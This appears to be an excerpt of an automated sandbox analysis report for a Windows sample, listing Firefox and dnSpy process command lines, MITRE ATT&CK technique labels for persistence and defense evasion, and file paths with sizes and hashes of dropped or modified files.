Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.4.39111859\459681240" -childID 3 -isForBrowser -prefsHandle 4132 -prefMapHandle 4128 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fae0f5c-800d-4896-ba08-7d51eefca126} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4144 18b5e8ca858 tab
PID:22104

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.5.1206322014\349148100" -childID 4 -isForBrowser -prefsHandle 4884 -prefMapHandle 4868 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3137ae56-adaa-496f-87cf-fca10b21d9a8} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4896 18b5ef72858 tab
PID:15844

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.6.48820180\180765753" -childID 5 -isForBrowser -prefsHandle 5036 -prefMapHandle 5040 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37046f28-5d37-4d14-9210-71481893df5d} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5028 18b5f395558 tab
PID:17564

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.7.150762552\563370986" -childID 6 -isForBrowser -prefsHandle 5232 -prefMapHandle 5236 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b990d43f-0e0c-4551-998c-7cff8c244d29} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5224 18b5f397058 tab
PID:2936

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.8.1609566664\1850000674" -childID 7 -isForBrowser -prefsHandle 5604 -prefMapHandle 5600 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f317a4ba-7feb-480f-b7d6-c1fcbb7e2ddb} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4640 18b60e6b158 tab
PID:2504

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.9.74855379\1169752606" -childID 8 -isForBrowser -prefsHandle 4244 -prefMapHandle 5916 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45398137-37c3-44b5-bb6c-51db84f2a330} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4232 18b5ce98a58 tab
PID:1664

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.10.193100520\78004601" -childID 9 -isForBrowser -prefsHandle 5980 -prefMapHandle 5976 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3ba369d-0eea-4e35-a565-956629a50785} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5988 18b5d20b858 tab
PID:12160

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.11.1807750368\2005817894" -childID 10 -isForBrowser -prefsHandle 5424 -prefMapHandle 5420 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de03f5fe-bb9e-412e-a2a2-1ebbdf000f35} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5308 18b60ee1858 tab
PID:18260

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.12.1603924224\751028772" -childID 11 -isForBrowser -prefsHandle 5412 -prefMapHandle 5604 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac1cbe18-d9f4-4d0e-9dfe-1fb8d6e2d203} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5824 18b5d594558 tab
PID:15264

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.13.871336187\333813456" -childID 12 -isForBrowser -prefsHandle 6008 -prefMapHandle 5972 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c57963fa-6b75-4c4f-92c1-4dfb96797cc1} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5996 18b5d348858 tab
PID:16600

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.14.274536080\251658328" -childID 13 -isForBrowser -prefsHandle 9876 -prefMapHandle 9872 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22d5c6d-ad17-4823-9868-206f82a41406} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 9884 18b5d503558 tab
PID:16608

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.15.1686809643\2123248245" -childID 14 -isForBrowser -prefsHandle 9876 -prefMapHandle 9872 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9bbebc3-394e-427b-94d6-f2d1a4e60004} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 6032 18b5ffb5158 tab
PID:19252

C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 3)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.16.1946648958\571724906" -childID 15 -isForBrowser -prefsHandle 10092 -prefMapHandle 10100 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0174db77-d861-491f-a9f2-1b10338c9a3a} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 10096 18b5ffb6058 tab
PID:19260

C:\Users\Admin\Desktop\dnSpy.exe (tree depth 1)
Command line: "C:\Users\Admin\Desktop\dnSpy.exe"
PID:4372
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (3)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (2)
- Modify Registry (4)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
Downloads
SHA106494c789a6789e2ed48bdf7f6dc2b28d94af567
SHA256087c89a5a2f835389adf7d39f74790e8a30928e0e7533b692fa669f16647ee92
SHA512a8ede9507cae952d09d6633163244480acaa084a25a42c31c9ad68c074281945831c6b7ff767effaa2515b77e5429e80bacb067962961f15a3cf528a589f2977
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5483de983d662239b603310bfd8da002e
SHA19a38b14bc0b8440b8926be9c8333ce2891d50297
SHA256cf128e6d733dee527a66a0d0e01c34d35e46aca07d20c279ef637336e5fe285b
SHA51286af7811755252a8452f7db474843404b4b59f95ca005a7845d6407cdd28d27d8d51da6becf9d2024a6dc75c5fc8aea2c2428d46075288c64ba82c09a794a6ad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize2KB
MD58e1e29d5796ab0046af49da75487dd69
SHA132fe062cff34091b0de06f8ade0d8df46604a736
SHA256c7bcad2c0ef7e9c41193b9b793516544668948f418cd3b9b76060775a7ff4f19
SHA512b90cb1c2e14d4a6885fc0f8925e7ce1463cabe768a3fef69c65c84682cbb1503d18edc58ee333faef0072b14ca6c1d6f6a4730ec0ad7de9ed691a75e0848b935
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize2KB
MD53873501be8a3f7dd0f677d8c9c378d4b
SHA1771d6aef7a0036382dafbef15044282861fb9cbd
SHA2566039cbc9e42ff3bfbfdfd279248aa7626fe6a58cafccf7a939aa1e12550ce363
SHA512ab525190e18e0430f06622e56d8d1d3af65ad389dccf36ac4411c2ea35ba8e32efab834b735d09dec43b410e9e922f7daa73d0132e914850d8ca79dea6b40659
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize2KB
MD598d067c8037c327997280e27b4fa7c64
SHA12b52203a95142a9de84ebd4de67e72f6b4b834f5
SHA25628b5e3d54f3f94ea477cef415c8b56c907534aabee788bcff290407ed473ba86
SHA5122a19b9dd9e721ae2b47faa16611503207ee03b1b720ca0bd72adf87b847e56dcc995b2a0a2343355a273dda8b2d73217cee419f9b8eae0495e61fca1b8f8ff27
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize8KB
MD53a774902876b710d9ec32a132d313129
SHA1e8989c403367922d0a823267dbcd5c096e44fa6f
SHA256502c407df01d1126fbf5c9658b3327104fb395a3eafb21e41e10649266e45a01
SHA51202a2588808dfe947b61cf0daac2666dde2514c63e209c3e9d77a08bc2cd84e3cab0b1c8c6fd10a0a9559857420a5e051b05516521fcf0b43b267b1efd940bfea
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize10KB
MD534cc47746c53040a48483e09a10447fa
SHA1b83f21f5f3c6a67ee430181fb43b9163004ae4e5
SHA25644725761b0eb5b3b66e1cee084fa6f98be391662ef75420f00de7e9a77b78688
SHA512446c2005e71e4a9ee7912059901fcd4160c38cf14b5949290c5d284c1d8090a55635103ad27852c1b991f9468fd58513ea3f5e3b51e411e64cd57ad8a390b28b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize10KB
MD525af63afec4c755e5621246bba6fbea8
SHA1b446a638ab38d5e544d5218d81392c950dbd38f4
SHA25630da0d33e878e5bd6c495193f284c0402e8690a762aa2c4d83c6ee1ab9f98cd3
SHA51296fdbd5ba5b03baca6443f09887a4b1b13aaac1aaefdc0380366c91a14f6b169e55b77c7fcbd56ce9b77816d04429d36fb46c49aa1f34ff45f7b8cbed5782cc9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize10KB
MD5287e5b752effbf0ff17ddcf250cfb26b
SHA159a60d7a8669a101f0f86dab50646357a9f682ea
SHA256fe7c3bca6f8348147a748ab4efb91e144b88ddb69caa74ad40bd7dab6a5da223
SHA512cbc6fd8ff42523e8b04dc875d3a0b78eeafd61122c73fe0eb9528ed2e9fc48e5b81df883d16673fe0a2cde7e4a821dbcb93c118fbbc797f2dff3c827c3b9416f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize10KB
MD5c89c81790178144fad43a73db8b6d754
SHA1d3c093a6480c621484b7b26298ec3f29ac93eb04
SHA256226c16f23fa0f089f3b1208d05a36c4f17c0919618442812b43abd6e0fee3e39
SHA512bbcfd21c1e5216c56263dd0ff4e826c100b59e62fe1976ce3907ab254e8cc50ee60fd0b69f43f9b8b539e97ad7da21f1346d4641c8a944d2d77137e0e1ac5558
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize10KB
MD54754f6dc91b2fe86114849d29d8d1aa4
SHA1541dc837ce938dd7c47f3a5e7bf13c21a28dcbcf
SHA25608ae35e0001c3b670555249097252b0497f60b037992d2ca09970544f40c7a8c
SHA512533805a427f83122cbc37ef4e1c0cfae6f794b516ef2af00ea6ec0e08821efe1aeef84fe717ee0844ebb39ad2e8f6470cf547dbf6e805d7f1f3a6d2108dcb7d5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4
Filesize10KB
MD52cae642cedd5ff5211d4ce2e0cb41884
SHA1e76033e316e6a15f77100c35deb2b51cbf749ae4
SHA256ead8203666e7d67aaa2c92e63f8911038a36515fce1afbbd40a277ed56dfc5b4
SHA51291d10f20f56ce98f2d25f04277ee6fb2c6f79f35040f60ec825b5e75742639682c41c93925c8b63fb455e20d3265cf2a95e4777fd29d1b729f5f63f15d7c4361
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\storage\default\https+++www.virustotal.com\cache\morgue\254\{4c3b4cba-f32f-488d-b2b8-4d32ee8326fe}.final
Filesize47KB
MD50d1a7f5503bd4bfbdb0b16e6666bc650
SHA14465c8bfe03e7840ebc1f0c2098471f1065dc2a8
SHA256d8145ba6dc19150853c958763c3432a903fd5c2dd056f823d19f4e803daa4426
SHA5128185fff9eadf34128a42c1a7c392a58dad6a7dd4b1b9b015e91849d8068dff0992b6fb09c4033b2fcb425c942f0554d4fbbc416429d3d4c2dc1bf678137cdb89
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize192KB
MD51bc146b13ec081074774153201f84dea
SHA1ace6ab680f97967ba19ad207f28be4c4e5ab0246
SHA256141f6257ce3a9a9ba1b439b1425fc8728d3ff83cca8e342ac86c30d745951409
SHA512fbb2d85756979dbc38940f71f9edc7ec487a5a17b893bdccb5a4619c550260caeebd5de2b3b94b429c54f8c0dc091c0fc2ad69260329f22cb5c4d70daaf2203c
-
Filesize
40B
MD553267fbe7ad9bb11d038f0e6cda71a3e
SHA177c6a0e28bf731fe9a7fbe1ae8e64866b52e05d1
SHA256453c29fb42d6806180e853766e5dfc6347e341503d5987f2ee2161af2a717a15
SHA512b46861337ae094e3c6a684ee58a2b7983fd687294f1eb4dbd368ac77961ed4e055d8454216c03f4c226f20b15dd3c28ef8767d2f9742c8acc2214e65a7bb4e62
-
Filesize
128B
MD511bb3db51f701d4e42d3287f71a6a43e
SHA163a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA2566be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2
-
Filesize
22KB
MD52d48799f75a7804c3d839416f05ad801
SHA1efd172afa5910d78d586f20547777d050fa03763
SHA2569acfead747da100de2d323c90a1f3e8a2ea40517a727cff284045386a1b9c2e7
SHA512f79a1a14060972f0ae99ec112c36395af5469c63bf33d51636cb2587303ea4bf01e3f9c759994459de9f6c0ae36020cc5d75868d89929e76521436afad0e0a71
-
Filesize
1.9MB
MD512d06024ad05d09da1db3467d3e0a930
SHA1036c03f42aa5a00b175dd0744038ddc5538c8967
SHA25604e3dfa5d2b5bddaf00992c13b0d3635b3f468a2df52f84cacae14b62b9bfc5f
SHA51252a42c0eeb1ef8003f65ebdbf582ccc2d9b944a0b69a1e5095a402b03caee6a786614652143794529f8e99f72e5666352fa64fe0da3c9ee5dd018dcd9f83f86a
-
Filesize
1.2MB
MD52f51ec8d7f93aebcd4bfca37c92a6082
SHA137f92ef5aed57cf6742be819291c45fa4979c07e
SHA256e00789c8a49f60cb4c121423f68a9870b81baf20ddb52d9a1938fb45d841b9aa
SHA5121b1e59e1f59ea159d3ff7f43b221a7899684d242d2b1a0df71eba9fd95316347608af65c34ef7514453c86a925264ac59003413f6c47f8450ba551b3047ff41f
-
Filesize
1.3MB
MD5caf53f22047858c64094bb9111980c17
SHA171151dda4e370e6ef5996d02d5f4093ff4c9d2c3
SHA25618168732c9460ea0f00ad1a389d2424a547b36f11cc20fc7059605741c380c50
SHA512b0af26845bb02526a86a4f54a394ed4fecd1a76e4c482061396fe1273b30997f0edf7792f41ad0882bbc5019a3063d181d0c8e611c3ad7937554d9eeb7e45de5
-
Filesize
1KB
MD5653d16b79c8d84c22f2296d6d391afef
SHA1d2a3b8277982247bd5ec48410eff76fd002dc1f6
SHA256d8338c058ce48a323a714a663940f7f5cbf7d10f11a08df78c67d80980f03b2c
SHA51268c58246f82691df77516ee4cc42bf56db587ea471bf0c962780bbc0db195f7013f104a4f7d26638ed8de200a16d7ded3625379c27bf8842ba1afbb10f5378b0
-
Filesize
2.0MB
MD5b1065153d2c189965edacd9aa0f1796c
SHA18046a205b903b4939c7db1aec6f1ca693e46a2a0
SHA256b2e650ebc1790a305c4fd0e8d989b7317753d9d60e9b7152ef63d4f3e9ec2091
SHA51289c33634479cc89f98eaf68a2258847716493fa947f224e1e13396059b11c4f2e031f0689368a7e6fd5d04ed8920a0ce967c69f8fc47c05a2e4f847cc9a2830b
-
Filesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
Filesize
2.8MB
MD555fa2eb4e223cbb6ce4fd0827d593856
SHA1a399e71dc4efdc4b92b792cdfa4fdb27d806d9ee
SHA2565cf5afa68b7d9001c6e28b1b29e4df7e9e311460f43c33292411bca3feb01c0a
SHA5129851dc844faba6cfe71e613d84eda8704a0ec7b0039f268ba45662508eb5787e344e6c2d62a08c0bb407a168e25e86bb7eca92bd329417e156c3caeed42208b9
-
Filesize
2.1MB
MD59d959bcb3482d418504af43b76f7a181
SHA147dd5a464f2c42405b02aa36a9eabbc5974d27d9
SHA256e83ad3c722bbece6957751fe492c203bdfc0bc3ad1542a3943a4767bf547bb66
SHA512a12dd25fe8adea6a8a0af57710b004968ffe8a1f12e2d5370fee96c01d03cd72fe06689f187afdfe465dc83bf6eaa2ecfe9e64130b058a5d56f733f2a2e965f0
-
Filesize
1.1MB
MD5538cb930295aefeef9bebf008db228e4
SHA1c92dacd1dc00f61eaccd8fa53cf91b5307d7edfe
SHA256ac00c3344dc6acb42519fc867a0ee89c3b326575b213f2da94898e47c749762b
SHA512851c1b3da2a043a1fc4f0ff93533ac22da1a5425d6f2c801f9fb0c4f2910979cdca3cdf4758e6c280566b996b2dffde9802fe518177d1ade906ceed6ddf21010
-
Filesize
4.1MB
MD5cad0083dbfd452bf5d40d4072dec168c
SHA1ec7ef3799f7acbf3c032b7acc6dc44640874d222
SHA25627f1f5f90341822b3e04c7b0035b2af5fe2dfd59263bcc05943f6141a4cba8a6
SHA5126c22325b7a1b8ae337ea7fff9949f707e07267acd800a52eb007f1869279ec4246aa2e4556d35fa7fe55a80493bb6864dd442d5d329ce698580dd47b4c832e56
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD519956178e630dad9eedeca1c22e87912
SHA13437df18f39f510ee06cbe861f08fbcc6450804c
SHA2562f139f903c89bca515c7ce8f5e44a95fb1b1dbcbd19bc94579335aa06ebe8b91
SHA51250042bf0a72449947e093ee4439fbf62cc1f3bb9025d6a5f17f8ebb5e1166b4221338042f33d3d5f354a9f3c75bfc61a62c53c3853456c121fc2c964643fde37
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD505197a455f1786d40ff19bb64e8e89be
SHA18be02fccd7da80704ea8bb9136bf3948e94533f9
SHA2568d12e2c4f0450a5eb621a0eb682b2c184a12117eb511f96e7373832c982875bf
SHA51225dfdeea8cfbd8fb9697a63488ff9610a7010ebdeb631ea080731f18d86c39f7022b76337f32971c778e11d37ce5120083d4725ed455d25ca369e8cabbe98829
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD52a97e7f81c1d454a49062378623a6f2c
SHA1ba080f2b8cd4e3b5ca6232a2fa33853a6b8a7d29
SHA25660b4f18ad3030da7606d380efb40b50b21cafa8829debc3d13ed31cfd35f0c09
SHA512462dc3de142ee17db2d73c7e49a7a9fb2d0d05baaafefec646b8049d60d3cb09d6655a68deb48f8dd71f06af71f93c61208f3e0b54533ffe4ca6473c297d0039
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD5700b1ed23da7ab6a6d91958e45e80c24
SHA17facc2ed41e6cb931868d715916520a1033f4a7f
SHA256e9f838965892be02637dbb1df737181189c6715475677ee5bfb9e55999d9b1da
SHA5123acdbf1f48cf9c89fd9661d991b198d135493eb67d9b32548ebdbf304bedd3b97fcb30085c0ad8d4cf94a4d7b6e9f1abfc175be7aa6d17485ea1e2f0bbd55b8b
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD54eee5381d1db49d743f144313e9041dc
SHA182d5ac7fa8641d10d275b7f1d0b28741684e1875
SHA256f24168206f009d8eb2605fbf164831a6f55ff7c24a4d98deed4f366e484abf86
SHA51296651b001dc19ab3596c7332305c2906358c404b7731ed9245977f3aa52946a0e99756a788152fcefc2ae4c697636958bf2b8dd4492aa7219bbc10aa577d4e15
-
Filesize
884KB
MD536fd5cc65e16087a6aa1e10cc8c5a4fc
SHA1a721f323b1df6273d9c9fb02f19bfa494b9e28c7
SHA256fa17c940226a87e0383e2719d29629ca4620a9a02a1150ba685772c8b2beb045
SHA512a85ab06d0a74b8fc0dfebc14345c14517dc546621ee87c572396d3951cfd18f8fa44a570b55a79cf797c3737bcb79436fdd96eda0d4e1594c15af44c5284abd5
-
Filesize
969KB
MD508de5b17056f729ab8e95b533d3a96bf
SHA13e75e7527ba5c7d08cbca0b03803bb27634fba99
SHA2569a06df7bc834bf58d05f413b894d46d9e29dbd69f76c4cea548993699d0767bd
SHA5129e4e07021927b18d273aa21a47375ef2fc98609cade5c8231dc7355a11d9a56cb0433558c295b09012928b5f39342666114d4e9a3ad0ef6f52843f3b48a60ad5
-
Filesize
128KB
MD50f8defd7b318d4958e302ad2227d99f0
SHA15745ab497e3fb3c665943d1a5c523bcca46f2000
SHA256ce2888ee58c8dbb43684ccc70353f7eb0f3393f4432f70348c77761526b41e90
SHA512823d3526c2ac035d5b467d7a8cfcd359977a3aadca922492202e2885e5308b63e2c0a06db1f004955bb55552c35a444e405736916717c8615a83456e768001fe
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\dbghelp.dll
Filesize320KB
MD519c64d5c9f948beb2e285ba148ef9910
SHA10e0992d1b7462b5e532653dcef439c90b06d5c86
SHA256a2a1fe7c2085473b2e200964c53f802301cba6e94b610e229ccd2d003b813ec8
SHA51265fa0db7e96dc0538771505f75255a2fec1027c137bba35d79994a8e6498a1108b24d9b21d70eb424173e768297dfdfe783fe264736a9a0debd21eccad4259ae
-
Filesize
1.7MB
MD59afd9ed1dcbf391dd9b60b34ae43565b
SHA18d3250d60b6da47530207764b3d7a03a867420ef
SHA2568c8496ab675b64940339b585c03d2e985d4b030d235703424b3cabc585e1e947
SHA51289dacb0be1c1acd7664112c4e677c6a46fa7b98fc008e4a3ef1b02725bce4f4cb8bec125dea3c2c425e97beb0dcb8e50e52baef2a6612e2680e2c899acfa5a91
-
Filesize
1.3MB
MD58abb587a43c1f4a95db34591c674763e
SHA16396cbc253f8f0bb5731205dfa9c8aa9a2e29833
SHA256596adee4ecc69d9b1b7db42279152184bdc2561c84629c4766b5193983d5adc1
SHA5125e792c7231d1ffb0cefd81cde48ae4153091ceeb1c62acc2128b6ff1edf7c8a9ea60a059dea07649727ed477215a6219f645ab5da2fbd5787a733340e1da9bcd
-
Filesize
2.6MB
MD5a4cb16296627a24978b883fda008a55e
SHA1b23635cbf294417997ac78f9c938439067240238
SHA256a584f4c286c2090fc407993dd430dc6fd916a20b4e29cd06be4ac80a14dc0d21
SHA5129b3198949b215a08d2700ad4a6bae20926857ff5edf93a4d0e210d99e01571a3983e05ad4c41a6d0782e8120acfb609a1f5282da06d16a7e15138308e2a44ae1
-
Filesize
2.7MB
MD5fbbd112c5ac832872c1dd8d68f3d1ce5
SHA10257fc84b84dfa419a14cb7a756b6d7eac846315
SHA2564f002058701022e0fef6c6b8a0a7ae83188eb39ab39282433fe0c85dd25980fc
SHA512724fdaea74a04648c21f8e2c3dc085bdefbdb4742a82bd11670efba082de3fc182bf66b54911de8301ca7b04c66387af4ad9a17f96ca2bf93876845447eab729
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
21KB
MD52b342079303895c50af8040a91f30f71
SHA1b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA2562d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47